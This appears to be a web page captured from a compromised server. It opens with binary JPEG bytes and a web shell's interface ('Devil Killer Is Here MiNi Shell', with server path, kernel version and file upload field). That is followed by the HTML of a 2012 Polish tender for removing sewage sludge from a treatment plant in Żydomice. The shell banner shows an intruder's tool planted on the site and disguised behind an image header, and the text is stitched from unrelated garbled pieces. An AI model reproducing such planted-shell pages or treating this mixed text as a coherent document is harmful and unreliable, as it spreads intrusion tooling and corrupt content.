JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120612/198456-N-2012.html

<p class="kh_header"><b>Rawa Mazowiecka: Załadunek i wywóz  komunalnych osadów ściekowych i skratek z terenu Oczyszczalni Ścieków w Żydomicach wraz z zagospodarowaniem. 
Numer zamówienia: RAWiK/08/2012</b><br>
<b>Numer ogłoszenia: 198456 - 2012; data zamieszczenia: 12.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rawskie Wodociągi i Kanalizacja Sp. z o.o. , ul. Juliusza Słowackiego 70, 96-200 Rawa Mazowiecka, woj. łódzkie, tel. 046 8142176, 8147075, faks 046 8142176.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Załadunek i wywóz  komunalnych osadów ściekowych i skratek z terenu Oczyszczalni Ścieków w Żydomicach wraz z zagospodarowaniem. 
Numer zamówienia: RAWiK/08/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia w przetargu nieograniczonym jest:
a)  załadunek i wywóz  wraz z  zagospodarowaniem  ustabilizowanych komunalnych osadów ściekowych (kod 19 08 05) z terenu Oczyszczalni Ścieków w Żydomicach, przewidywana  ilość do  3600 Mg  o średniej  zawartości suchej masy 25 %,
b)  załadunek i wywóz  wraz z  odzyskiem (R3) ustabilizowanych komunalnych osadów ściekowych (kod 19 08 05) z terenu Oczyszczalni Ścieków w Żydomicach, przewidywana  ilość do 1000 Mg  o średniej  zawartości suchej masy 25 %,
c)  załadunek i wywóz wraz z odzyskiem (lub unieszkodliwieniem) odpadów  pościekowych w postaci skratek (kod 19 08 01) z terenu Oczyszczalni Ścieków w Żydomicach, przewidywana ilość do 20 Mg. 
Zamawiający dopuszcza zagospodarowanie ustabilizowanych komunalnych osadów ściekowych wymienionych w pkt. III ppkt. 1a) SIWZ na cele określone w art. 43 ust 1 pkt 3,4,5 Ustawy z dnia 27 kwietnia 2001 r. o odpadach - Dz. U. z 2010 r. Nr 185 poz. 1243 z późniejszymi zmianami oraz Rozporządzeniem Ministra Środowiska z dnia 13 lipca 2010 w sprawie komunalnych osadów ściekowych - Dz. U. Nr 137 poz. 924 tj.:
  - dostosowania gruntów do określonych potrzeb wynikających z planów gospodarki odpadami, planów zagospodarowania przestrzennego lub decyzji o warunkach zabudowy i zagospodarowania terenu,
  -  upraw roślin przeznaczonych do produkcji kompostu,
  -  upraw roślin nieprzeznaczonych do spożycia i do produkcji pasz; zgodnie z Ustawą z dnia 27 kwietnia 2001 r. o odpadach - Dz. U. z 2010 r. Nr 185 poz. 1243 z późniejszymi zmianami oraz Rozporządzeniem Ministra Środowiska z dnia 13 lipca 2010 w sprawie komunalnych osadów ściekowych - Dz. U. Nr 137 poz. 924.
Transport i załadunek będzie się odbywał sprzętem Wykonawcy i na jego koszt. 
Rozliczenie ilości odbieranego osadu (19 08 05) zostanie dokonane na podstawie pojemności skrzyni ładunkowej samochodu ciężarowego, którym będzie odbierany osad z oczyszczalni. Wykonawca przed rozpoczęciem usługi ma obowiązek udokumentować pojemność skrzyni ładunkowej dla każdego pojazdu. Ustalenie ciężaru 1 m3 w Mg do rozliczeń, nastąpi poprzez zważenie komisyjne pierwszych trzech partii załadowanego osadu,  na Składowisku Odpadów w Pukininie (odległość od oczyszczalni ok. 5 km) na koszt Zamawiającego. Na tej podstawie zostanie określony średni ciężar 1 m3 osadu, który będzie podstawą do rozliczeń. Każdorazowy wyjazd samochodu z odebranym osadem musi być potwierdzony dokumentem WZ przez kierownika oczyszczalni ścieków lub osobę przez niego wyznaczoną.
Rozliczenie ilości odbieranych skratek (kod 19 08 01) wystąpi poprzez zważenie komisyjne każdej załadowanej partii, na Składowisku Odpadów w Pukininie (odległość od oczyszczalni ok. 5 km) na koszt zamawiającego. 
Wykonawca będzie realizował usługę na czynnym obiekcie w dni powszednie 
 (z wyłączeniem  niedziel i świąt) w godzinach 7:00 do 19:00.
Sposób zagospodarowania, odzysku unieszkodliwiania odpadów zależy od Wykonawcy i winien być zgodny z obowiązującymi przepisami ochrony środowiska. Wykonawca winien posiadać zezwolenia i decyzje właściwego organu na prowadzenie działalności w zakresie transportu, zagospodarowania poprzez unieszkodliwianie lub odzysk odpadów objętych zamówieniem. Wykonawca będzie ponosił odpowiedzialność za działania objęte zezwoleniami oraz decyzjami. Odebranie od Zamawiającego osadów ściekowych spowoduje przeniesienie odpowiedzialności za powyższy odpad  na Wykonawcę w rozumieniu art. 25 pkt. 3 Ustawy o odpadach.
2. Wykonawca zobowiązany będzie do: 
1) używania podczas świadczonych usług sprzętu o następujących wymogach:
   -  szczelny (nie powodujący wycieków),
   - posiadający ładowność i wytrzymałość przystosowaną do wywozu osadów 
i pozwalający na ich odbiór z Oczyszczalni w wymaganym przez Zamawiającego terminie,
2) zapewnienia utrzymania stanu nawierzchni dróg (zakładowych i publicznych) pod względem czystości w czasie trwania usługi,
3) potwierdzania odbioru osadów ściekowych z Oczyszczalni Ścieków w Żydomicach na kartach przekazania odpadów i prowadzenie innych stosownych dokumentów wynikających z Ustawy z dnia 27 kwietnia 2001 r. o odpadach - Dz. U. z 2010 r. Nr 185 poz. 1243 z późniejszymi zmianami oraz Rozporządzeniem Ministra Środowiska z dnia 13 lipca 2010 w sprawie komunalnych osadów ściekowych - Dz. U. Nr 137 poz. 924.
  4) zagospodarowanie ( odzysk lub unieszkodliwianie ) odpadów o kodzie 19 08 05 musi  się odbywać na terenie woj. Łódzkiego z zastrzeżeniem sytuacji opisanej w art. 9 ust. 4 Ustawy z dnia 27 kwietnia 2001 r. o odpadach - Dz. U. z 2001 r. Nr 62 poz. 628 z późniejszymi zmianami oraz zgodnie z Rozporządzeniem Ministra Środowiska z dnia 13 lipca 2010 w sprawie komunalnych osadów ściekowych - Dz. U. Nr 137 poz. 924, a w szczególności odpady określone w pkt. III, ppkt. 1a) 
SIWZ w odległości nie większej niż 20 km od granic miasta Rawa Mazowiecka.

3. Wykonawca zobowiązany jest do posiadania i dostarczenia niezbędnych   dokumentów:
1) odpowiedniego zezwolenia, licencji lub koncesji na prowadzenie działalności w zakresie transportu oraz gospodarowania odpadami (odzysk lub unieszkodliwianie)  będącymi przedmiotem przetargu zgodnie z Ustawą z dnia 27 kwietnia 2001 r. o odpadach - Dz. U. z 2010 r. Nr 185 poz. 1243 z późniejszymi zmianami,
2)  akt własności lub umowa dzierżawy - tj. dokument określający tytuł prawny gruntów, na których mają być stosowane osady ściekowe - wydany przez właściwy organ,
W przypadku dzierżawy - zgodę właściciela gruntów na zastosowanie na nich osadów ściekowych.
3) niezbędnej dokumentacji geologicznej i geodezyjnej gruntów na których osady mają być stosowane,
4)  badania gruntów wykonane metodami referencyjnymi zgodnie z Rozporządzeniem Ministra Środowiska z dnia 13 lipca 2010 w sprawie komunalnych osadów ściekowych - Dz. U. Nr 137 poz. 924 na których osady mają być stosowanelub potwierdzenie pisemne przez laboratorium do którego zostały dostarczone próbki gruntów (numery działek, z których zostały pobrane próbki) do badania według powyższego rozporządzenia (wyniki badań muszą być dostarczone przed podpisaniem umowy).
4. Zamawiający ustala dla Wykonawcy podstawowe wytyczne przy realizacji zadania:
1) przestrzeganie przepisów ustawy z dnia 27 kwietnia 2001 roku o odpadach Dz. U. Nr 185 poz. 1243 z późniejszymi zmianami,
2) przestrzeganie przepisów Rozporządzenia Ministra Środowiska z dnia 13 lipca 2010r. w sprawie komunalnych osadów ściekowych Dz. U. Nr 137 poz. 924,
3) przestrzeganie przepisów Ustawy Prawo ochrony  środowiska z dnia 27.04.2001r. Dz. U. z 2012r. Nr 62 poz. 627 z późniejszymi zmianami.
 4) w przypadku kontroli Inspekcji Państwowych i ewentualnych kar finansowych nałożonych na Zamawiającego (jako na wytwórcę) wynikających z zagospodarowania osadów niezgodnie z warunkami zawartymi w umowie, Zamawiający obciąży finansowo Wykonawcę.
5. Zamawiający przewiduje możliwość dokonania wizji lokalnej terenu, na którym będzie realizowany przedmiot zamówienia.
1) Odbycie wizji  lokalnej nie jest obowiązkowe.
2) Wizję lokalną Wykonawcy będą mogli odbyć w godzinach 8:00 - 14:00 po wcześniejszym uzgodnieniu terminu z Zamawiającym - Osoby odpowiedzialne ze strony Zamawiającego;
Wojciech Augustyniak  - Kierownik  Oczyszczalni Ścieków, 
 3) Podczas wizji lokalnej nie będą udzielana jakiekolwiek odpowiedzi na pytania dotyczące SIWZ, jednakże po jej zakończeniu Wykonawca może złożyć zapytania stosownie do form porozumiewania się  określonych w postępowaniu. Powyższe podyktowane jest koniecznością zachowania zasad uczciwej konkurencji.
4) Wykonawca, który zrezygnuje z odbycia wizji lokalnej nie będzie mógł podczas wykonywania umowy zgłaszać uwag do sposobu jej realizacji, stanu faktycznego i okoliczności związanych z wykonaniem zamówienia, o których mógł się dowiedzieć uczestnicząc w wizji lokalnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.38.00-4, 90.51.37.00-3, 90.53.30.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium
Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości: 
6000,00 zł (słownie: sześć tysięcy złotych)
Wadium musi być wniesione przed upływem terminu składania ofert w sposób i w formie, jak określono w Rozdziale X.2 i X.3 SIWZ Wykonawca, którego oferta nie zostanie zabezpieczona wadium w wymaganej wysokości i formie oraz w wymaganym terminie, zostanie wykluczony z postępowania.
2.Forma wadium
Wadium może być wnoszone w jednej lub kilku następujących formach: 
(a) pieniądzu;
(b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
(c) gwarancjach bankowych;
(d) gwarancjach ubezpieczeniowych;
(e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275, z późn. zm.).

3. Sposób i termin wniesienia wadium
3.1 Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 
Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości zgodnie z treścią Rozdziale X.1 SIWZ i wybranej formie spośród możliwych wymienionych w Rozdziale X.2.SIWZ.
3.2 Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego, z podaniem nazwy i numeru zamówienia podanego w SIWZ: 

Rawskie Wodociągi i Kanalizacja Sp. z o. o. 
ul. Juliusza Słowackiego 70
96-200 Rawa Mazowiecka, Polska 
PKO BP S.A. o/ 1 Rawa Mazowiecka
nr konta 46 1020 45 80 0000 1102 0084 5057

Kopię polecenia przelewu należy dołączyć do oryginału oferty (jest to warunek konieczny, ale niewystarczający do stwierdzenia przez Zamawiającego terminowego wniesienia wadium za pomocą przelewu bankowego), a do kopii oferty winna być dołączona kopia tego dokumentu. 
Wniesienie wadium w pieniądzu w formie przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, jeśli bank prowadzący ww. rachunek potwierdzi, że przed upływem terminu składania ofert, uznał ww. rachunek Zamawiającego kwotą wymaganego wadium.
3.3 Jeżeli wadium wnoszone jest w formach wymienionych w Rozdziale X.2(c) do X.2(d) SIWZ, gwarancja winna być bezwarunkowa, nieodwołalna i sporządzona zgodnie z obowiązującym prawem oraz winna zawierać następujące elementy: 
(a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), nazwę gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib;
(b) numer zamówienia nadany przez Zamawiającego i nazwę zamówienia;
(c) określenie wierzytelności, która ma być zabezpieczona gwarancją; 
(d) kwotę gwarancji;
(e) termin ważności gwarancji; 
(f) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
(i) odmówił podpisania Umowy na warunkach określonych w ofercie; lub
(ii) nie wniósł zabezpieczenia należytego wykonania Umowy; lub
(iii) zawarcie Umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
(g) zobowiązanie gwaranta do zapłacenia kwoty gwarancji, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 PZP lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn  nieleżących po jego stronie.
3.4. Jeżeli wadium wnoszone jest w formach wymienionych w Rozdziale X.2(b) i X.2(e) SIWZ poręczenie powinno być sporządzone zgodnie z obowiązującym prawem oraz winno zawierać następujące elementy:
(a) nazwę poręczyciela, nazwę wierzyciela (Zamawiający), nazwę dłużnika (Wykonawcy), którego dług poręczenie zabezpiecza oraz wskazanie ich siedzib;
(b) numer zamówienia nadany przez Zamawiającego i nazwę zamówienia;
(c) określenie wierzytelności, która ma być zabezpieczona poręczeniem;
(d) określenie wysokości wierzytelności objętej poręczeniem;
(e) termin ważności poręczenia;
(f) zobowiązanie poręczyciela do zapłacenia kwoty poręczenia na pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
(i) odmówił podpisania Umowy na warunkach określonych w ofercie; lub
(ii) nie wniósł zabezpieczenia należytego wykonania Umowy; lub
(iii) zawarcie Umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
(g) zobowiązanie poręczyciela do zapłacenia kwoty poręczenia, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 PZP lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn  nieleżących po jego stronie.
3.5 W przypadku, gdy gwarancja lub poręczenie, o których mowa w Rozdziale. X.3.3 i X.3.4 SIWZ, nie określą którejkolwiek z sytuacji opisanych w Rozdziale X.5 SIWZ, Zamawiający uzna, że oferta Wykonawcy nie została zabezpieczona wymaganym wadium.
3.6 W przypadku wniesienia wadium w formie gwarancji lub poręczenia, oryginał gwarancji lub poręczenia należy dołączyć do oryginału oferty, a kopię gwarancji lub poręczenia do kopii oferty. 
Wadium wniesione w formie gwarancji lub poręczenia musi zostać odpowiednio zabezpieczone przez Zamawiającego (np. poprzez zdeponowanie w banku), w związku z tym dokument gwarancji lub poręczenia nie może zostać złączony z ofertą w sposób trwały.
3.7 Wykonawców, którzy nie wnieśli wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 PZP, albo nie zgodzili się na przedłużenie okresu związania ofertą, wyklucza się z postępowania o udzielenie zamówienia. 
4. Zwrot wadium
Zamawiający, z zastrzeżeniem postanowień pkt. X.5 SIWZ, zwraca wadium według zasad określonych w art. 46 PZP.
Wadium Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający  zwraca niezwłocznie po zawarciu Umowy oraz wniesieniu wymaganego zabezpieczenia należytego wykonania Umowy.
5. Zatrzymanie wadium
5.1 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w Rozdziale XXIV SIWZ, nie złożył dokumentów lub oświadczeń, o których mowa  w Rozdziale V SIWZ, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
5.2 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
(a)odmówił podpisania Umowy w sprawie zamówienia na warunkach określonych 
w ofercie; 
(b)nie wniósł wymaganego zabezpieczenia należytego wykonania Umowy; 
(c)zawarcie Umowy w sprawie niniejszego zamówienia stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od sformułowania szczegółowego wymogu w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej:
- 2 usługi polegające na zagospodarowaniu (odzysk lub unieszkodliwianie) odpadów w ilości przynajmniej  2.500 m3 każda, z potwierdzeniem, że usługi te zostały wykonane należycie
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od sformułowania szczegółowego wymogu w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od sformułowania szczegółowego wymogu w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek jeżeli wykaże, że:
- posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia: - na kwotę nie mniejszą niż 40.000,00 zł.
 (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zobowiązany jest do posiadania i dostarczenia niezbędnych   dokumentów:
